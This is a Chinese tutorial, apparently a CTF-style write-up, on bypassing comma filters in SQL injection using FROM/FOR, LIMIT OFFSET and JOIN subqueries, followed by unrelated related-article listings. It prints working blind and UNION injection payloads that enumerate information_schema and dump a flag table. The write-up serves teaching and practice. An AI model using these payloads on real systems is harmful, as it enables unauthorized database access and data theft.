【逗号绕过】

devtools/2024/10/17 19:12:41/

简介

请添加图片描述
所以为了避免逗号被过滤,我们来看看如何绕过叭

一、From for 绕过

请添加图片描述
我们直接看一个题目:

id=1 页面输出hello user
id=1 and 1=1%23  页面返回hello user
id=1' and 1=1%23  页面不返回数据

符合盲注,并且是一个数字型的sql注入,尝试使用盲注

id=1 and ascii(substr((select database()),1,1))=119

提示hacker,很明显被过滤了,尝试使用from for绕过

id=1 and (ascii(substr((select database())from(1)for(1)))=119)%23

页面回显hello,user 说明绕过成功,使用burp的intruder模块进行爆破,下面的这些payload,同样需要使用burp的intruder模块进行爆破

获取表名
id=1 and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database())from(1)for(1)))=102%23获取列名
id=1 and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag')from(2)for(1)))=108%23获取数据
id=1 and ascii(substr((select flag from flag)from(1)for(1)))=102%23

二、Limit offset绕过

请添加图片描述
请添加图片描述

从第1条数据开始,返回两条数据
select * from user limit 2 offset 1;
从第0条数据开始,返回两条数据
select * from user limit 2 offset 0;

请添加图片描述

三、join 绕过

select 子查询

请添加图片描述
请添加图片描述
直接练习:

注入点测试
username=admin&password=admin  没有回显username=admin' and 1=1%23    改一下username,闭合注入点,页面回显admin 说明存在注入,并且是字符型的sql注入猜测列数
username=admin' order by 3%23

测回显位时发现被过滤了:

请添加图片描述
测试回显位

username=admin' union select 1,2,3%23 被过滤
username=admin' union%23      没被过滤
username=admin' union select   没被过滤
username=admin' union select 1, 被过滤

说明逗号被过滤

尝试使用join 绕过逗号

逗号绕过
username=admi' union select * from ((select 1)A join (select 2)B join (select 3)C)%23&password=s

页面回显2 说明第二位是回显位,之后的payload如下:

数据库名
username=admi' union select * from ((select 1)A join (select database())B join (select 3)C)%23&password=s拿表名
username=admi' union select * from ((select 1)A join (select group_concat(table_name) from information_schema.tables where table_schema=database())B join (select 3)C)%23&password=s拿列名
username=admi' union select * from ((select 1)A join (select group_concat(column_name) from information_schema.columns where table_name='flag')B join (select 3)C)%23&password=s拿数据
username=admi' union select * from ((select 1)A join (select flag from flag)B join (select 3)C)%23&password=s

http://www.ppmy.cn/devtools/126538.html

相关文章

R语言:ERGM指数随机图模型2:flomarriage数据集

R语言:ERGM指数随机图模型2:flomarriage数据集

文章目录 加载数据集可视化网络模型1三元组形成节点协变量加载数据集 library(ergm) data(package=ergm) set.seed(123) data(florentine) flomarriage查看数据集网络的整体网络结构属性,例如总边数为20条。 Network attributes:vertices =
阅读更多...
代码随想录 -- 贪心 -- 跳跃游戏

代码随想录 -- 贪心 -- 跳跃游戏

55. 跳跃游戏 - 力扣(LeetCode) 思路:跳跃的覆盖下标范围能否覆盖最后一个元素。 起始时站在第一个元素上,覆盖下标范围为0;遍历覆盖到的所有元素,更新覆盖的下标范围(取最大的覆盖范围&#…
阅读更多...
Solon 3.0 引入 SqlUtils :数据库操作的反朴归真

Solon 3.0 引入 SqlUtils :数据库操作的反朴归真

Solon 3.0 版本发布后,带了一个新的特性 —— SqlUtils。这一全新的数据库操作框架给开发者提供了更加透明、灵活的数据库交互方式,可显著提升了代码的透明度和维护性。本文将浅入探讨 SqlUtils 的引入背景、使用方法以及它对市场和开发者群体的潜在影响…
阅读更多...
【TDA】mapper

【TDA】mapper

https://giotto-ai.github.io/gtda-docs/latest/notebooks/tmp/mapper_quickstart.html?highlightmapper https://giotto-ai.github.io/gtda-docs/latest/modules/mapper.html?highlightmapper https://www.quantmetry.com/blog/topological-data-analysis-with-mapper/ http…
阅读更多...
python 爬虫 入门 一、基础工具

python 爬虫 入门 一、基础工具

目录 一,网页开发者工具的使用 二、通过python发送请求 (一)、get (二)、带参数的get (三)、post 后续:数据解析 一,网页开发者工具的使用 我们可以用 requests 库…
阅读更多...
2024 年 9 月区块链游戏研报:行业回暖,Telegram 游戏引发热潮

2024 年 9 月区块链游戏研报:行业回暖,Telegram 游戏引发热潮

作者:Stella L (stellafootprint.network) 数据来源:Footprint Analytics Games Research Page 9 月份,区块链游戏代币的市场总值增长了 29.2%,达到 232 亿美元,日活跃用户(DAU)数量上升了 1…
阅读更多...
AVL树的实现

AVL树的实现

AVL树 1. AVL的概念2. AVL树的实现2.1 AVL树的结构2.2 AVL树的插⼊2.2.1 AVL树插⼊⼀个值的⼤概过程2.2.2 平衡因⼦更新2.2.3 插⼊结点及更新平衡因⼦的代码实现 2.3 旋转2.3.1 旋转的原则2.3.2 右单旋2.3.3 右单旋代码实现2.3.4 左单旋2.3.5 左单旋代码实现2.3.6 左右双旋2.3.…
阅读更多...
力扣【48-旋转图像】【数组-C语言】

力扣【48-旋转图像】【数组-C语言】

题目:力扣-48 给定一个 n n 的二维矩阵 M 表示一个图像。请你将图像顺时针旋转 90 度。你必须在 原地 旋转图像,这意味着你需要直接修改输入的二维矩阵。请不要 使用另一个矩阵来旋转图像。 写代码之前先分析矩阵旋转的本质: 矩阵顺时针旋转…
阅读更多...
最新文章

Copyright @ 2022~2023